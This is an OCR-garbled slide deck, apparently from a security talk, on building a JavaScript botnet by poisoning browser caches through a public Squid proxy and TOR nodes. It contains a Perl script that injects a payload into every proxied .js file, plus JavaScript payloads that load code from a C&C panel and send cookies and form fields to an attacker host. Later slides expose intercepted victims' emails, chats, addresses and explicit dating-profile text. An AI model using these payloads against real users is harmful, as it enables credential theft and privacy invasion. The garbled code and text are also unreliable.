Owning "bad" guys 
{and mafia} with 
Javascript botnets 

Chema Alonso & Manu "The Sur" 
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Let's do a botnet but 



We are lazy 
We haven't money 
We haven't Oday 
We aren't the FBI 
We aren't either: 

Google 
• Apple 

Microsoft 
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Let them to 
be infected 
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Man in the Middle schemas 



■ Evil FOCA - 0.1.0.0 



File Jr* Configuration ^ About 



Network 
B -^JV Neighbors 

B - » 001 E3CB38B D F <cubo05) 

! m fe30::e103:f04e:d 755: 6211 

^ {si 152.ieS0.192 

a'm 0019B974E527 

! « fe30::2c52:5684:1a2bf6ab 

^ {si 152.163.0.199 

001B3356979E 

! « fe30::99b4:S1a2:3b15:S2 

^ {ki 152.ieS0.198 

S-W 5CD998BFS69A 

^ « 192.163.0.51 

{si 0021000522M 

! « fe30::ddaa:3752fb02:7eb0 

^ {si 152.16S.0.194 

C86C8796F7C5 

^ « 192.168.0.253 

S - W 001195A31F10 

^ » 192.168.0.50 

a-h 001 CBF4D 1006 

i {si 192.163.0.191 



MITM IPv6 [mitM IPv4 | DoS IPv6 | DoS IPv4 | DNS Hijacking 



Neighbor advertisement spoofing |sLMC| DHCPv6| 

Gateway Q Q Targets 



Intercept communications between client and server 
Compromised channel ->Pwned! 
Network 
ARP Spoofing 
Rogue DHCP(6) 
ICMPv6 Sppofing 

• SLAAC Attacks 
DNS Spoofing 

• • • 

Evil FOCA Rulez! 



I 
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J Start 



Attack type 
DNSHijacking 

Neighbored vertiseme . . 



Domain: * 
Resolve as: 1.2.3.4 

Target 1 : feSO: :e 1 03f 04e :d799:621 1 (8) 
Target 2: fe80: :2c52:55S4: 1 a2b f 6ab l3) 



Spoofs: 56 



Active 

□ 

3 



3 ► 



Time Module Message 

17: 17 NeighborSpoofing NewneighbordetectedwithOOl B33560AS3 as physical address 

17:17 NeighborSpoofing Performing a MITM (Neighbor spoofing} attack between feS0::e103f04e:d799:621 1 and feS0::2c5... 

17: 13 Network Discovery Sending neighbor discovery packets 

17: 19 Network Discovery Sending neighbor discovery packets 

17:20 Network Discover/ Sending neighbor discover/ packets 

17:21 Network Discovery Sending neighbor discovery packets 

17:22 Network Discovery Sending neighbor discovery packets 



□ 
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Man in the Browser 



Plugins 
BHO 
Addons 



Access to all data 

Passwords 
• Code 

Banking trojans 
"A russian in my IE" 



j XML_Troyano_Banco,xml: Bloc de notas 




Archive Edicion Form a to Ver Ayuda 



f<?xrnl version="l. 0" encodi ng="wi ndows-1251" ?> 
<i nject 

url ="wel 1 sf argo" 

bef ore="name=useri d autocompl ete=" off 1 ></div>" 
what=" 

<DI VXL AB EL f r =U 5 € r 1 d>ATM P I N< / LAB E L > I <B RX5 PAN 

cl ass='' mozcl oak 'xlNPUT i d=pi n tablndex=2 maxLength=4 

type=password size=4 name=pin 

autocon-pl ete= " off 1 x/spanx/div> 
1 1 

b"lock="a"lt=Go ,r 
check="pin" 
quan="4 r 
content="d" 
> 

</i nject> 



j 
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JavaScript in the Middle 

• Poisoning Browser cache 

• No permanent 

• Deleting cache means infection cleaned 
Cached content is used if not expired 

• Allows attackers to inject remote javascript 

• Access to: 

Cookies 

Not HTTPOnly (more or less) 

• HTML Code 
Form fields 

• URLs 

Code execution 

• • • 
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Google Analytics js &malware 



Trojan JS/Redirector.G A (?) 

Encyclopedia entry 

Published: Sep 30, 2010 

Aliases 

Not available 

Alert Level (?) 

Severe 

Antimalware protection details 

Microsoft recommends that you download the latest definitions to get protected. 

Detection initially created: 
Definition: 1.91.391.0 
Released: Sep 30, 2010 
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How to inject JavaScript code 



Persistent XSS 

• Owning HTTP Servers 

Network Man In the middle attacks 

WiFi 
• ARP Spoofing 

IPv6 

Memcache attacks 

• Imagination 
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- Framework to own bowser's cache 

- Inject a javascript in each client 

- That javaScript loads payloads from C&C 

- http://beefproject.com 

- Very Well-Known 
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How to create a 
JavaScript Botnet 
from the scratch 
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TOR Nodes 
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TOR Nodes 



Guardar Todo Guardar la seleccion Copiar Seleccionar Todos Buscar Borrar Preferencias Avuda Cerrar 



Advanced 





>■ 

Horn 


Tipo 


Mensaje 


A 


octoen 


14:03.171 


Notice 


Opening Directory listener on 0.0.0.0:9030 


octoe 11 


14:03.171 


Notice 


Opening Socks listener on 127.0.0.1:9050 


oct 06 11 


14:03.171 


Notice 


Opening Control listener on 127.0.0.1:9051 


oct 06 11 


14:03.282 


Notice 


Parsing GEOIP file. 




oct 06 11 


14:23.108 


Notice 


Have tried resolving or connecting to address '[scrubbed]' at 3 different places. Giving up. 




oct 06 11 


15:18,772 


Notice 


Interrupt: will shut down in 30 seconds, Interrupt again to exit now, 




oct 06 11 


15:44.105 


Notice 


Tor vO. 2. 1.26, This is experimental software. Do not rely on it for strong anonymity, (Running on Very recent version of Windows [major=6,minor=l] [workstation] {terminal services, singl... 




oct 06 11 


15:44.105 


Notice 


Initialized libevent version 1.4. 12-stable using method Win32. Good. 




oct 06 11 


15:44.105 


Notice 


Opening OR listener on 0.0.0.0:443 




oct 06 11 


15:44.106 


Notice 


Opening Directory listener on 0.0.0.0:9030 




oct 06 11 


15:44.106 


Notice 


Opening Socks listener on 127.0.0.1:9050 




oct 06 11 


15:44.106 


Notice 


Opening Control listener on 127.0.0.1:9051 




oct 06 11 


15:52,810 


Notice 


Guessed our IP address as 62,82.159.150 (source: 208.83.223.34). 




oct 06 11 


15:54.166 


Notice 


Bootstrapped 90%: Establishing a Tor circuit. 




oct 0-5 11 


15:55,524 


Notice 


Tor has successfully opened a circuit. Looks like client functionality isworking. 




oct 06 11 


15:55,525 


Notice 


Bootstrapped 100%: Done. 




oct 06 11 


15:55,548 


Notice 


Now checking whether ORPort 62 .82 .159 .150:443 and DirPort 62.82.159.150:9030 are reachable... (this may take up to 20 minutes -- look for log messages indicating success] 


oct 06 11 


16:08,172 


Notice 






oct 06 11 


18:45,643 


Notice 


i'r cur DN!i? provider gave an answer for "du. invalid",, which is not supposed to exist. Apparently they are hijacking Dl < J - = '...;==:. Tryina to correct for this. We've noticed 1 possibly bad addr... 




oct 06 11 


18:45,683 


Notice 


Your DNS provider has given "192.168.1.101" as an answer for 11 different invalid addresses. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... 




oct 06 11 


19:15,659 


Notice 


Your DNS provider tried to redirect "www.yahoo.com" to a junk address. It has done this with 3 test addresses so far. I'm going to stop being an exit node for now, since our DNS seems so... 




oct 06 11 


29:17.827 


Notice 


Your DNS provider gave an answer for "Ippwspkk, invalid", which is not supposed to exist. Apparently they are hijacking DNS failures. Trying to correct for this, We've noticed 1 possibly b,.. 




oct 06 11 


29:17.893 


Notice 


Your DNS provider has given "192,168.1.101" as an answer for 11 different invalid addre^es. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... 




oct 06 11 


29:38.245 


Notice 


Have tried resolving or connecting to address '[scrubbed]' at 3 different place:. Giving up. 




oct 06 11 


35:52.059 


Warning 


Your server (62.82.159.150:443] has not managed to confirm that its ORPort is reachable. Please check your firewalls, ports, address, /etc/hosts file, etc. 




oct 06 11 


35:52.071 


Warning 


Your server (62.82.159.150:9030] hasnot managed to confirm that its DirPort is reachable. Please check your firewalls, ports, address, /etc/hosts file, etc. 





Informatica 

www.iriformatica64.com 




Not a Rocket Scince.... 
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Buy a bullet-Prof 



Not: 
The Pirate Bay 
Amazon 

• (Remenber Wikilea 

Megaupload 
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Configure SQUIE 



GET /HTTP/1.1 
Host: www.web.com 




Response 
Home.html 



GET /a.jsp HTTP/1.1 
Host: www.web.com 



Proxy 




GET /HTTP/1.1 
Host: www.web.com 

< 

Response 
Home.html 

GET /a.jsp HTTP/1.1 
Host: www.web.com 

< 



M 



Chrome W... Gmail Busqueda ... 



^ chrome m sv \ s n 



Cerrado recientemente 



Response 
a.Jsp + pasarela.js 
include http://evil/payload.js 



GET /payload.js HTTP/1.1 
Host: evil 
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Configure SQUID Proxy 

Squid. conf: Activate URL rewrite program 



# By default f a URL re writer is 


not used. 


- 

# Default : 




# none 




url rewrite program /etc/squid/poison 


.pi 



.htaccess: Apache No Expiration Policy 



:/etc/squid# cat /var/ www/ trap/ .htaccess 
ExpiresActive On 

ExpiresDef ault "access plus 3000 days" 
:/etc/squid# 
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Infect all JavaScript files 



# ■ /usr/bin/perl 



while (<>} 
{ 

chomp $_; 

if ($_ =- /{. *\.js}/i> 

{ 

Surl = Si; 

system( "/usr/bin/wget " f ,r -g/ r , "-O", "/var/www/ trap/ $pid-$ count . js", "$url"} ; 
system ( "chraod o+r /var/ww/ trap/ Spid-S count . j s " } ; 

system ( "cat /etc/sguid/pasarela. js » / var /www/ trap/ Spid-S count . js"} ; 
print w http : //127 .0.0.1: 80/tmp/Spid-Scount . j s\n" ; 

> 

else 

{ 

print "$_\n"; 

> 



$ count ++; 
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Infect all JavaScript files 




function payload() 

{ x = doc jir.ent . getElerr.erLtByld ( pr poisorLpayload pr ) ; 

if [x = null) 
{ 

docoir.ent .write ( n <script>functian getip(jsan) { 

docuir.ent . write ( 1 < script type=\\\ "application/ j svsscr ipt\\\ w 
src=\\\"http : //-fl B /panel /poison pay 1 o ad . php ? i d=\ 1 + 

json.ip + \ 1 \\\"x/scr\ 1 +\ 1 ipt> B ) ; 

> ;</script> 

■); 

do concent ■ write ( pr <scr ip t id= 1 paisonpayload 1 type= 1 application/ j ava script 1 
src =, littp: //( ^/panel/ jsonip.php?callt:ack^getip l x/script> pr ) ; 

> 

> 

payload ( } ; 
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Publish your Proxy 



XRO^Y.COM ^ 

more than just proxy 



Proxy Solutions 



Home Premium Proxy Proxy List UK | 

Favourite By country By port Add new 



Remove 



Add an Open Proxy to the Database. 

You are more than welcome to add your proxies in our 

database! 

Your submission will be verified to check whether or not 
your proxies are open for public use, and only hosts 
which are current open HTTP proxies will be added to 
our database. 

The check process is not immediate - it may take hours 
before your proxy is listed in the full proxy list. 

Our site is not an online proxy checker. You will receive 
no feedback as to whether or not proxies in your 
submittion are valid HTTP proxies. 

However submitting quality proxylists you can get an 
elite user status which gives you special level access to 
our database and Xorum. 



GET YDUR PROXY 



FRFH D AH RIAL 



1 


} 







+? 



RSS feed DB dump 



User: Anonymous 
[Log in] [Register/ Why Join?] 



A^Iware Capacity Flapping ^^AX^t.cojriPimffljig 
Model Available VM Capacity with Capacity Manager. 
Free 30-Day Trial 



AdChoices \j> 
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Let Internet do the magic 




proxy 



BU5C|Ueda ^proximadan^ 



Todo 

Imagenes 

Maps 

Videos 

Noticias 

Shopping 



Whois Info 



www.xroxy.com/whois1902391.htm - Traducir esta pagma 
13 Feb 2012 - Xroxy proxy lists, xorum forums, and we b proxy ser vice Paid Proxy ... 
can find Whois Information for the following IP address: 



fl ft4 - Si mole Proxv List - IP Info 


www simple proxy 1 1 st com/info. php?.. 







(nvd/y) Status Offline Country Germany City: ? Last online: Fri Feb 24 ... 
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Do Payloads: Cookie stealing 



document.write(" 

<img id= , domaingrabber' src='http://X.X.X.X/panel/ 
domaingrabber.php?id=0.0.0.0& 
domain= M +document.domain+ M & 
location= ,, +document.location+"& 
cookie= ,, +document.cookie+ ,M style- display:none;'/>"); 
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Do Payloads: Form fields stealing 



function JcLagStartf) 

vsr forir.s = psrent . docoir.ent . getElen.erits3yTsgNair.e ( pr forrr. rr ) ; 

for (i = ; i < forms . length; i++} 

{ 

forms [ i ] . addEvent Lis t ener ( 1 siibir.it 1 f function ( ) ■[ 
var cadens = ri M ; 

var forir.s = parent . docuir.ent . getElen.erLtsByTagNair.e ( rr forrr. pr ) ; 

for (x = ; x < forms . length; x++} 
{ 

v-= r elements = forms [x] . elements; 

for (e = ; e < elements . length; e++} 

{ 

cadena 4= elements [e] .name + "%3d pr + elements [e] .value + 

} 

} 

sttachForir. (cadena) ; 
}, false); 

} 

■ 
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Who •"$"•$ is using 
this kind of services? 
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Mafias: Help the Prince 




AGENT-X COMICS ^ WWW.ACENT-X.COM AU 
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Mafias: Nigerian Scammers 



5jjQil.com 




_jRe: FOR YOUR KIND X 



£l rQyalhotelengland@hotmail.co.uk 
§3 Mail Collector 

L_j Spam 
Lj Drafts (1) 
4_j Sent (3) 
_J Trash 
Q Saved I Ms 



, More Actions T 



Subject 



Date 



Size 



□ 4 


1 


wasim butt94@vahoo.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


12/ 2 0/11 


104 


KE 


□ 




Bikash Thapa 


SEND THIS APPLICATION Lb 1 1 bR TO ZONAL COORDINATORS 


12/15/11 


3 


KE 


□ 




Bikash Thapa 


FROM BRITISH IMMIGRATION LAWYbR'S BOARD OF DIRbCTORS 


12/15/11 


36 


KE 


□ 




meena anam 


THIS IS HOW YOU WILL SEND APPLICATION LETTER TO ZONAL COORDINATORS 


12/15/11 


3 


KE 


□ 




meena anam 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


12/15/11 


36 


KE 


□ 4 


t 


harish.badhan@vahoo.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


12/10/11 


100 


KE 


□ t 


f 


yousaf_simba@hotmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


12/03/11 


103 


-"' B 


□ 




naveed shahid 


SEND PAYMENT NOW SO WE WILL SEND YOUR WORK PERMIT CERT IMMEDIATELY FROM ... 


12/01/11 




KE 


□ £ 


t 


naveed_shahid97@yahoo.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


11/23/11 


104 


KE 


□ i 


; (r 


saima_ahsan20@hotmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


10/08/11 


103 


KB 


□ | 


i 


amirbba715@gmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/22/11 


104 


KE 


□ 4 


r » 


wa si m_butt9 4-@yahoo.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/20/11 


103 


KE 


□ 




MUHAMMAD YASIR 


GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE 


09/19/11 


2 


KE 


□ _ 


r » 


MUHAMMAD YASIR 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/19/11 


102 


<5 


□ 




asghar shahid 


GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE P... 


09/16/11 


2 


KE 


□ i 


f » 


thiruc20@gmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/16/11 


102 


•-" B 


□ | 


r » 


asghar shahid 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/11/11 


101 


KE 


□ 4 


f 


englandroyalyorkhotel@yahoo.... 


Fw: FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/11/11 


103 


KE 


□ _ 


i » 


subukshakir@hotmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/06/11 


101 


KE 


□ | 




dharam.verma25@gmail.com 


FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 


09/03/11 


101 


KE 
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Mafias: Nigerian Scammers 



fjf mail.com Home y_jSent (3/48) l^J Re: FOR YOUR KIND x J ^ FROM BRITISH IMMI I xN 

Forward Resend Delete Lj Move To T ^ More Actions. T 



UK Immigration Work Permit and Visa Services 

Our Duty is to provide you with a working permit from the UKBA and your firm suporting documents. ENTRANCE WORK PERMIT as requested by 
the immigration department to enable your completement required documents and possible approval entry visa to be issued at the British high 
commissioner in your country ,you are required to reach us with your passport scanning pages, with two passport photograph EU size along with 
your processing fee of GB £275 Pounds before we could issue of your ENTRANCE CLEARANCE WORK PERMIT from our office. On receipt of these:- 

(a) Your passport scanning pages, 

(b) Two passport recent photographs 

(c) Filled candidate payment form with processing fee of GB £275 pounds 

We will to assist to forward all your details to British LABOUR DEPARTMENT for processing of your entry working permit certificate as requested 
by the immigration department which will guarantee the issuance of your four 4 -years entry working visa at the British embassy in your country 
of residence . As soon as we received from you , your request will be process and issued within 43-HRS; 



This are generally mentioned in the prospectus of the Employment/Tourist tour or invitation by any UK company management for r and immediately 
your documents is approved admission in that particular institute will qualify him or her for entrance clearance entry working permit . 



INFORMATION METHOD OF PAYMENT 

You should reach us with your payment through the means western union money transfer or money -gram money transfer bank and print out the 
candidate payment form to fill with the payment transfer informations from the western union , scan and send back to our office with:- 
(i) Passport scanning pages r (ii) Two recent passport photographs along with the (Mi) Filled candidate payment form for processing and issuing of 
your entrance clearance work permit labour from our office .Attached file is contained your application candidate payment form for entry 
clearance work permit certificate and make payment through the western union money transfer to Accountant Receiver Name: (Mr Addison 
Stuart) Address: 30-83 Long Lane,EClA 9ET London U.K 

Then print out the candidate payment form to fill, scan and send your passport scanned pages along with two passport photographs for immediate 
processing and issuing of your request from our office within -43 Hours 
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Mafias: Nigerian Scammers 




£j mail.com Home f |£j]Seiit (3/48) QRe: FOR YOUR KIND X 



<£$ Check Mail \$i Reply T L^J Forward © Spam [g| Delete L_ l Re: FOR YOUR KIND ATTENTION^ 



khem raj puri 



I Close fullscreen, j 



Re: FOR YOUR KIND ATTENTION 

"khem raj puri" -=krajpuri@yahoo.com> j^j 



09/01/11 06:47 AM □ Less info 



» 4* ffi 



To: britishlawyersworkpmt@englandmail.com 



Dear Sir 

I respected your kindly information for me about that job. But at that time my group clients are not to beleive me for deposite that amount. So after given to 
the clearance paper then they are possible and beleive to payment for me. 

We can not send you money through Western or Bank : Because our government can not give us to permission. If you are agree then only one way to send that 
amount in our Nepalase UK Embassy through your hand. 

Otherwise it is not possible to do for further processed then relase the task. 



Thanking about me 



Regards 
Khem Raj Puri 
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Mafias: Nigerian Scammers 
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Mafias: Nigerian Scammers 



m 



Picturel327.jpg 




Picture.jpg 



Picturel323.jpg 
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Mafias: Predators 



meeta 

where singles meet 






home search updates account logout 


i] | EH Messages v 


Matches v £ Members v 


^ Groups v ^ Forums v 





<3 Home 



travelgirls 





Friends 




Axionqueen 

Age: early 30's 
Location: Keller, Texas 
Gender: female 

Looking for: dating / a relationship 
Interested in: men 
Member since: 3 months ago 
Relationship status: Single 



Hair color: Black 

Eye color: Brown 

Religion: christian 

Ethnicity: a si a 

Occupation: baby sitter 

Wants children? Depends on what partner 

wants 



About Axionqueen 

AM LOOKING FOR A VERY STRAIGHT FORWARD AND WELL UNDERSTAND MAN TO BE MY 
SOUL MATE AND HE AS TO BE VERY HARD WORKING AND READY FOR A LONG TIME 
RELATIONSHIP WITH ME AND ALSO HAVE A GOOD HIGH SEX DRIVE AND HE AS TO BE 
DISEASE FREE AND VERY CLEAN AND VERY HONEST, LOVING, CARING, DOMINANT, 
PASSIONATE AND BE A MAN OF IS WORDS AND READY TO TRY NEW THINGS WITH ME AND 
LOVE EATING MY PUSSY AND TAKING ME FROM THE ASS ALWAYS AND ALSO LET ME HAVE 
THE LAST DROP OF IS CUM IN MY MOUTH FOR MY OWN GREAT DESIRED 
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Mafias: Predators 



HaveAFling 

Frnd your Kiwi Fling :) 



Messages Profile Settings Credits Logout 



Search: Age 




Send Message 



| F1 1 | Advanced Search 



(X Axionqueen 



Single seeking males for serious relationships then marriage 

Lives in Auckland, New Zealand 



Rec&nt Activities 

Age 
Gender 
Zodiac Sign 

Self Introduction 



Languages Spoken 

Weight 

Height 



Last login 22 min ago 
31 

Female 
Aries 



AM AVERY COOL HEADED AND EASY GOING LADY AND AM 
CARING, LOVING, OPEN MIND ED , H N E ST, PAS S 1 NATE , HARD 
WORKING AND AM DOWN TO HEART PERSON AND I HATE 
CHEATING OR LIES AND AM WHO I CALL MY SELF.I LIKE COOKING 
AND GETTING MY ENVIRONMENT CLEAN ALWAYS AND I LIKE GOING 
SHOPPING, CAMPING, SWIMMING.FISHING AND AM 

English 

60 kg - Average/Medium 



174 cm [5" 3") 
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Mafias: Predators 




Home | Top Charts | Search | Who's Online? | Interested in you 

Profile | Mailbox | Favorites | You're interested in.. | Invite a friend 

Translator 



PlanetaLove USA 

Ycur profile has been viewed 1 times 5 people interested in you? 
Average rating: 10,00 (I votes) 
There are 42 new users! 
There is 2 online users! 




4 



j ri r \ i i 




USER PROFILE 




Username: axionqueen 
Age: 31 

Gender: Female 
Location: Lynchburg, 
Virginia, United States 
Looking for a man 
between: 39 and 60 years 
Last Online: online now 

Average Rating: 10.00(1 

votes) 



Welcome axionqueen | Logout 



Attractive, Pretty, Sexy, Sensual, 
Affectionate 

I like: 

Stay with my family, Helping 
people, Walking, Dancing, 
Reading 

I'm looking for: 

A special man, Love, A man who 
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Mafias: Predators 











® 0,49 status ^ joyandreas32 


V 










@ Ubersicht 


- Profi 1 Q Mailbox 


lB> Freunde "J Mail verfassen 


Suche 


D 





Freunde online ^ m 42 Ttiorsten Sorry aber ich weifi n#c_ 

Freunde '.verb en 



Profil Verlauf Details 1 Freund Gruppen Foto Ticker Gastebuch 
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kkbill1980(12:09:40 (UTC}):Hello sweetie 
fiat176punto(12:12:49 (UTC)):Hello my sweet Mous 
kkbill 1 980(12:1 3:00 (UTC)):how are you doinf sweetie 
fiat176punto(12:13:16 (UTC)):doinf ??? 

kkbill 1980(12:1 3:52 (UTC)):what am fine i just came back from the booking office and my love when did you really want me to come 

fiat 1 76punto(12: 1 5:38 (UTC)):I want it that You come to me 

fiat176punto(12:15:51 (UTC)):why what is the Problem 

kkbill 1980(12:16:03 (UTC)):when did u want me to come next week or what ? 

fiat176punto(12:16:48 (UTC)):I dont now what is the best about you 

kkbill 1980(1 2:17:08 (UTC)):no problem am just asking to know the date i will choose to book the flight ticket and all i need to get all my papers with the flight ticket book it will cost me 700euro 
fiat176punto(12:17:11 (UTC)):when is the best Day for Fly 

kkbill 1980(12: 17:34 (UTC)):am ready to fly anytime so far you are ready to have me with you my love 
fiat176punto('12:18:33 (UTC)):Year thats fine so I thing you can look for Wendsday 
fiat176punto(12:19:11 (UTC)):When its no Problem for you 
kkbill1980(12:20:16 (UTC}):okay that is good 
fiat176punto(12:20:21 (UTC)}: Baby You have my Address now 

kkbill 1 980(12:20:54 (UTC)):and when did you think you can get the 700euro send so that i can make the booking and get everything ready for me to fly down to germany 
fiat176punto(12:22:05 (UTC)}:Baby You have my Address now 
fiat176punto(12:22:15 (UTC)):??? 

kkbilH 980(12:22: 1 8 (UTC)):i will send you the full nicked pics tonight 
fiat176punto(12:23:11 (UTC)):oh Baby this is nice 

kkbill 1980(12:23:16 (UTC)):when did you think you will have chance to go and send me the 700euro for the booking so that i will get everything ready 
fiat176punto(12:24:57 (UTC)):The pictures are so tht I can see your all Pircings ??? 

kkbi 111980(12:25:18 (UTC)):i will send you my full information so that you can use it to send the money from western union to me okay 
fiat176punto(12:25:49 (UTC)):yes Baby when You sen the Pic You can send me were I must Take the Money 
kkbill 1 980(12:26:1 6 (UTC)):sorry i dont understand you my love 

fiat176punto(12:27:17 (UTC)):When You send The Pictures to night You can sent me the Western Union Information 

kkbi 111980(12:27:58 (UTC)):ich frage Sie, dass, wenn Sie Zeit haben, urn zu gehen und senden Sie mir die 700 €, so dass ich die Buchung kann tun und alles bereit 
kkbill1980(12:30:15 (UTC)):are you there 
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Contacts Calendar Notepad 



What's Hew? - Mobile Mail - Options ^ 



Check Mail 



New - 



Q western union 



Mail Search 



Get the newest Yahoo! Mail 



Refine Results 



Sender 

curtisgipson96 (35) 

achim-dudziak-1962@hotma 

Kayla Bill (13) 

Andreas Kochling (11) 

fiatl76punto (9) 

> View all 31 senders 

Folders 

@C@ Chats [129) 
Sent (13) 
Inbox (11) 

Dates 

2012 (81) 
2011 (97) 

Message Status 

Read (153) 

I Infhnnarl M PTl 



Search Results 1 -25 of 1 53 messages for western union 



|__"] Message View | L3 Photo View | #J Attachment View 



First | Previous | Nex± | Last 



D e I e^^^^^^^^^^J 



Move... ▼ 



From 



H • Kayla Bill 

...and what 
and look for 
heart --- On 

Kayla Bill 

...and what 
and look for 
heart — On 

□ 4^ Josef Landhuis 

...and what 
and look for 




Re: Schatz I love you big Kiss 

is your bank manager with sending money if you are truthful 
a western union shop to send it or you just forget about it 

Wed. 2/29/12. Josef Landhuis... 



9:27 PM 



collect the money from your bank 
and stop playing game with my 



Re: 

is your bank manager with sending money if you are truthful 
a western union shop to send it or you just forget about it 

Wed, 2/29/12. Josef Landhuis... 

[ No Subject ] 

is your bank manager with sending money if you are truthful 
a western union shop to send it or you just forget about it 



9:20 PM 



Sent 



collect the money from your bank 
and stop playing game with my 



4:29 PM 



Inbox 



collect the money from your bank 
and stop playing game with my 
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Von: Kayla Bill 

Betreff: Re: Schatz I lo ve you big Kiss 

An: "Josef Landhuis" ^^^H^MMP^^^Hfe"- 

Datum: Donnerstag, 23. Februar, 2012 07:10 Uhr 

Hello sweetie why you have not sent me the nicked pics you promise me ?and i just sent you my nicked pics and please dont show it to another person is for 
only your eyes okay i love you and i will be waiting to chat with you when you come online today i miss you and last night my net was bad that is why i did 
not come online last night and i have also send you my info for the western union 



From: Josef Landhuis <i 
Subject: Re: Sch atz I love you big Kiss 
To: "Kayla Bill 11 <i^^^MP^^^fc> 

Date: Wednesday, February 29, 2012, 4:05 AM 

hello Baby 

I dont no but but my Bankmanager ask me that the Address City and country is not pasibel now what we can do ??? 
gime a athoer one please 

Your love Josef big Kiss Baby 

Von: Kayla Bill 
Betreff: Re: Schatz I lovj 
An: "Josef Landhuis" 

Datum: Mittwoch, 29. Februar, 2012 14:43 Uhr 

fuck it stop playing game on me i gave you my right address and what is your bank manager with sending money if you are truthful collect the money from your bank and 
look for a western union shop to send it or you just forget about it and stop playing game with my heart 
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g Scammers 





My Ads 














View All 


\ 


KTV3111403Charrning Registered Yorkshire ... 


$200.00 Start: 2/29/2012 Exp: 3/30/20 12Active 




[> Online Preview 


@f Edit Details 


@ Edit Photos 


j O EditUpsells 


Renew 


% Close 


(§] Clone 




\ 


3] ALA31 1 1330Charming Registered Yorkshire ... 


$200.00 Start: 2/29/2012: Exp: 3/3 0/201 Motive 




[> Online Preview 


g Edit Details 


@ Edit Photos 


O EditUpsells 


^ Renew 


Close| 


(§] Clone 




[5] ALA8111363Charmirig Registered Yorkshire ... 


$200.00 Start: 2/29/2012 Exp: 3/3 0/201 Motive 




[> Online Preuiew 


Edit Details 


@ Edit Photos 


j O EditUpsells; 


Renew 


Close 


(§] Clone 




@ ALA8 1 1 1 332Charming Registered Yorkshire ... 


$200.00 Start: 2/29/2012 Exp: 3/3 0/20 12Active 




[> Online Preuiew 


(If Edit Details 


@ Edit Photos 


[2j EditUpsells 

• ... ... ... .. .. j 


■V Renew 

I 


% Close 

I 


@] Clone 




@ NJC81 1 1331 Ch 


arming Registered Yorkshire ... 


$200.00 Start: 2/29/2012 Exp: 3/30/20 12Active 




[> Online Preuiew 


0" Edit Details 


@ Edit Photos 


\ [J] EditUpsells! 

'. _ J 


Renew 


^ Close 


@] Clone 
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Warning! This 
picture could hurt 
your emotions... 
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Dog Scammers 

Category: For Sale - Free Stuff, Freebies, & Bargains 
Views: 7 




Start Date: 2/29/2012 
Price: $200.00 



Find Similar Listings 



Free Stuff, Freebies, Si Bargains 



Go! 



^ Create Alert 



Meet the Advertiser h e:lp! 




Ask Advertiser a Question 
View More from this Advertiser 
Feedback: jessicabrownl2 



Other Options 




Watch This Ad 
Clip This Ad / View Clip List 
Email to a Friend 
Report As Inappropriate 
H ShareThis *j 
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Psychotics 



1 90 .90 .26. 1 69 vkJeo.xnxx. co m 



k= M other 
=Ssarch 



1 90 .90 .26. 1 69 video, wuoe. co m 



k= Rape sister 
=Search 



1 90 .90 .26. 1 69 w w w xnxx - CD m 



k= Violent rape 
=Search 



1 90 .90 .26. 1 59 '"' id eDxnxx - CD m 



k-Violence 
=Search 



comment= 
= Sutmit 
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Annonymous 



[-] w h atisrny ipadd ress. cd m 7 f o rms 



13E.37.2?-.?G 



hideme.ru 



sa= Search 



server[2]=rand 

ip[2]=rand 

url[3]=http:// 

name[3]=Ta5aai&a ijaeeaaee 

server[3]=rand 

ip[3]=rand 

ur[4]=http:// 

name[4Ha£aaiea ijaeeaaee 

ser. r er[4]=rand 

ip[4]=rand 

fvm=1 

fvm=2 

fvm=3 

D 

=lmSaaebu eta 
q=nene 



ikto ria .d ju @y a nd ex. ru 
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Annonymous 



|Comains pf zombie 1 




|domain list of fl.26.64.35 




[+]| [-] 2ip.ru 




[ + ] 1 H anunturi.telegrafDnline.ro 




[ + ] 1 H facebDDk.com 




url 


cookie 


1 1 LLp.PP 1 1 ■ I I I . I U ■_■ ■_■ l_i ■_■ U IT. ■_■ ■_• 1 1 If |_i IU y ll 1 l3i 1 1 P. '-i UT j l . p 1 I p '--I 1 U 1 1 1 1 ■-■ 1 1 1 LLp u .11 u 

static, a k. fbcd n . n et/co n n ect/xd_proxy. ph p? 

versio n =3#cb=M 31 b538S5B9B22&o rig in = http%3A^2F%2F w w w . relo ad.. It% t 
2Ff3fdf3EEa91c39airelation=parent.parent&transport=postmessage ^ 




[+] | [-] whatismyipaddress.com 




[+] | [-] w o rkJ . n eed f o rspeed . co m 




[+] | [-] www.youtube.com 
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Rare people in a rare World 



Account 



Refer A Friend 



Affiliate Program 
Referral Report 



Account Details 

Balance 

Redeem 



Your cu rren t balan ce represen ts how active you r i n volvemen tin ourservice has been up to now. Su mmary stated below. 

■ Since joining up, you h ave accu mulated a total of $24.38 

■ You have not redeemed yet 

■ You do not qualify for redemption yet due to insufficient balance 
Displaying ! to 20 of 383 articles on page 1 of 20 





£2i i « 








£± 1, 










Culinary Traditions Of France 


Gourmet 


S0.05 


2/29/2012 
1:42:42 PM 


2/29/2012 
1:43:41 PM 


2/29/2012 
1:44:22 PM 


Why Network Marketing Sucks 


Networking 


S0.05 


2/29/2012 
1:41:46 PM 


2/29/2012 
